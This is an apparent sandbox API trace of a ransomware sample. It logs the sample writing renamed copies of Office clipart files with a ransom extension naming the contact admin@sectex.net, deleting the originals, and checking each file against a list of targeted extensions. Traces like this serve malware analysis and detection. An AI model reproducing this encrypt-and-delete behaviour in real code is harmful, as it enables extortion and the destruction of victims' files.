	[0147.013] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01084_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0147.013] GetLastError () returned 0x0
	[0147.013] ReadFile (in: hFile=0x3a0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x96c, lpOverlapped=0x0) returned 1
	[0147.058] WriteFile (in: hFile=0x3ac, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x970, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x970, lpOverlapped=0x0) returned 1
	[0147.058] ReadFile (in: hFile=0x3a0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.059] WriteFile (in: hFile=0x3ac, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.059] SetEndOfFile (hFile=0x3ac) returned 1
	[0147.059] CloseHandle (hObject=0x3ac) returned 1
	[0147.059] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.059] SetEndOfFile (hFile=0x3a0) returned 1
	[0147.061] CloseHandle (hObject=0x3a0) returned 1
	[0147.061] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.061] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01084_.wmf")) returned 1
	[0147.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 63
	[0147.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 63
	[0147.062] lstrlenW (lpString=".doc") returned 4
	[0147.062] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.062] lstrlenW (lpString=".docx") returned 5
	[0147.062] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.062] lstrlenW (lpString=".pdf") returned 4
	[0147.062] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.062] lstrlenW (lpString=".xls") returned 4
	[0147.062] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.062] lstrlenW (lpString=".xlsx") returned 5
	[0147.062] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.062] lstrlenW (lpString=".ppt") returned 4
	[0147.062] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 63
	[0147.062] lstrlenW (lpString=".zip") returned 4
	[0147.062] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.062] lstrlenW (lpString=".rar") returned 4
	[0147.062] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.062] lstrlenW (lpString=".bz2") returned 4
	[0147.062] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.062] lstrlenW (lpString=".7z") returned 3
	[0147.062] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 63
	[0147.062] lstrlenW (lpString=".dbf") returned 4
	[0147.062] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 63
	[0147.063] lstrlenW (lpString=".1cd") returned 4
	[0147.063] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 63
	[0147.063] lstrlenW (lpString=".jpg") returned 4
	[0147.063] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 63
	[0147.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 63
	[0147.063] lstrlenW (lpString=".doc") returned 4
	[0147.063] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.063] lstrlenW (lpString=".docx") returned 5
	[0147.063] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.063] lstrlenW (lpString=".pdf") returned 4
	[0147.063] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.063] lstrlenW (lpString=".xls") returned 4
	[0147.063] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.063] lstrlenW (lpString=".xlsx") returned 5
	[0147.063] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.063] lstrlenW (lpString=".ppt") returned 4
	[0147.063] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 63
	[0147.063] lstrlenW (lpString=".zip") returned 4
	[0147.063] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.063] lstrlenW (lpString=".rar") returned 4
	[0147.063] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.063] lstrlenW (lpString=".bz2") returned 4
	[0147.063] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.063] lstrlenW (lpString=".7z") returned 3
	[0147.063] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 63
	[0147.063] lstrlenW (lpString=".dbf") returned 4
	[0147.063] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 63
	[0147.064] lstrlenW (lpString=".1cd") returned 4
	[0147.064] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 63
	[0147.064] lstrlenW (lpString=".jpg") returned 4
	[0147.064] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.064] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.064] lstrlenW (lpString="FD01193_.WMF") returned 12
	[0147.064] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01193_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0147.077] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=1160) returned 1
	[0147.077] CloseHandle (hObject=0x2a0) returned 1
	[0147.077] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01193_.wmf")) returned 0x20
	[0147.091] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01193_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.092] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01193_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0147.092] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.092] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.092] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01193_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0147.092] GetLastError () returned 0x0
	[0147.092] ReadFile (in: hFile=0x3a0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x488, lpOverlapped=0x0) returned 1
	[0147.142] WriteFile (in: hFile=0x3ac, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x490, lpOverlapped=0x0) returned 1
	[0147.142] ReadFile (in: hFile=0x3a0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.142] WriteFile (in: hFile=0x3ac, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.143] SetEndOfFile (hFile=0x3ac) returned 1
	[0147.143] CloseHandle (hObject=0x3ac) returned 1
	[0147.143] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.143] SetEndOfFile (hFile=0x3a0) returned 1
	[0147.145] CloseHandle (hObject=0x3a0) returned 1
	[0147.145] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.145] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01193_.wmf")) returned 1
	[0147.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 63
	[0147.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 63
	[0147.146] lstrlenW (lpString=".doc") returned 4
	[0147.146] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.146] lstrlenW (lpString=".docx") returned 5
	[0147.146] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.146] lstrlenW (lpString=".pdf") returned 4
	[0147.146] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.146] lstrlenW (lpString=".xls") returned 4
	[0147.146] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.146] lstrlenW (lpString=".xlsx") returned 5
	[0147.146] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.146] lstrlenW (lpString=".ppt") returned 4
	[0147.146] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 63
	[0147.146] lstrlenW (lpString=".zip") returned 4
	[0147.146] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.146] lstrlenW (lpString=".rar") returned 4
	[0147.146] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.146] lstrlenW (lpString=".bz2") returned 4
	[0147.146] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.146] lstrlenW (lpString=".7z") returned 3
	[0147.146] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 63
	[0147.147] lstrlenW (lpString=".dbf") returned 4
	[0147.147] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 63
	[0147.147] lstrlenW (lpString=".1cd") returned 4
	[0147.147] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 63
	[0147.147] lstrlenW (lpString=".jpg") returned 4
	[0147.147] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 63
	[0147.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 63
	[0147.147] lstrlenW (lpString=".doc") returned 4
	[0147.147] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.147] lstrlenW (lpString=".docx") returned 5
	[0147.147] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.147] lstrlenW (lpString=".pdf") returned 4
	[0147.147] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.147] lstrlenW (lpString=".xls") returned 4
	[0147.147] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.147] lstrlenW (lpString=".xlsx") returned 5
	[0147.147] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.147] lstrlenW (lpString=".ppt") returned 4
	[0147.147] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 63
	[0147.147] lstrlenW (lpString=".zip") returned 4
	[0147.147] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.147] lstrlenW (lpString=".rar") returned 4
	[0147.147] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.147] lstrlenW (lpString=".bz2") returned 4
	[0147.147] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.147] lstrlenW (lpString=".7z") returned 3
	[0147.147] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 63
	[0147.148] lstrlenW (lpString=".dbf") returned 4
	[0147.148] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 63
	[0147.148] lstrlenW (lpString=".1cd") returned 4
	[0147.148] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 63
	[0147.148] lstrlenW (lpString=".jpg") returned 4
	[0147.148] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.148] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.148] lstrlenW (lpString="FD01658_.WMF") returned 12
	[0147.148] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01658_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0147.162] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=17924) returned 1
	[0147.162] CloseHandle (hObject=0x31c) returned 1
	[0147.162] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01658_.wmf")) returned 0x20
	[0147.162] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01658_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.163] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01658_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0147.163] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.163] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.163] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01658_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0147.163] GetLastError () returned 0x0
	[0147.163] ReadFile (in: hFile=0x31c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x4604, lpOverlapped=0x0) returned 1
	[0147.166] WriteFile (in: hFile=0x38c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x4610, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x4610, lpOverlapped=0x0) returned 1
	[0147.167] ReadFile (in: hFile=0x31c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.167] WriteFile (in: hFile=0x38c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.167] SetEndOfFile (hFile=0x38c) returned 1
	[0147.167] CloseHandle (hObject=0x38c) returned 1
	[0147.167] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.167] SetEndOfFile (hFile=0x31c) returned 1
	[0147.169] CloseHandle (hObject=0x31c) returned 1
	[0147.169] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.170] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01658_.wmf")) returned 1
	[0147.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 63
	[0147.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 63
	[0147.170] lstrlenW (lpString=".doc") returned 4
	[0147.170] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.170] lstrlenW (lpString=".docx") returned 5
	[0147.170] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.170] lstrlenW (lpString=".pdf") returned 4
	[0147.170] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.170] lstrlenW (lpString=".xls") returned 4
	[0147.170] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.171] lstrlenW (lpString=".xlsx") returned 5
	[0147.171] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.171] lstrlenW (lpString=".ppt") returned 4
	[0147.171] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 63
	[0147.171] lstrlenW (lpString=".zip") returned 4
	[0147.171] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.171] lstrlenW (lpString=".rar") returned 4
	[0147.171] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.171] lstrlenW (lpString=".bz2") returned 4
	[0147.171] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.171] lstrlenW (lpString=".7z") returned 3
	[0147.171] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 63
	[0147.171] lstrlenW (lpString=".dbf") returned 4
	[0147.171] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 63
	[0147.171] lstrlenW (lpString=".1cd") returned 4
	[0147.171] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 63
	[0147.171] lstrlenW (lpString=".jpg") returned 4
	[0147.171] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 63
	[0147.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 63
	[0147.171] lstrlenW (lpString=".doc") returned 4
	[0147.171] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.171] lstrlenW (lpString=".docx") returned 5
	[0147.171] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.171] lstrlenW (lpString=".pdf") returned 4
	[0147.171] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.172] lstrlenW (lpString=".xls") returned 4
	[0147.172] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.172] lstrlenW (lpString=".xlsx") returned 5
	[0147.172] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.172] lstrlenW (lpString=".ppt") returned 4
	[0147.172] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 63
	[0147.172] lstrlenW (lpString=".zip") returned 4
	[0147.172] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.172] lstrlenW (lpString=".rar") returned 4
	[0147.172] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.172] lstrlenW (lpString=".bz2") returned 4
	[0147.172] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.172] lstrlenW (lpString=".7z") returned 3
	[0147.172] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 63
	[0147.172] lstrlenW (lpString=".dbf") returned 4
	[0147.172] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 63
	[0147.172] lstrlenW (lpString=".1cd") returned 4
	[0147.172] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01658_.WMF") returned 63
	[0147.172] lstrlenW (lpString=".jpg") returned 4
	[0147.172] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.172] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.172] lstrlenW (lpString="FD01660_.WMF") returned 12
	[0147.173] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01660_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0147.175] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=12958) returned 1
	[0147.175] CloseHandle (hObject=0x31c) returned 1
	[0147.175] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01660_.wmf")) returned 0x20
	[0147.175] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01660_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.175] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01660_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0147.175] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.175] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
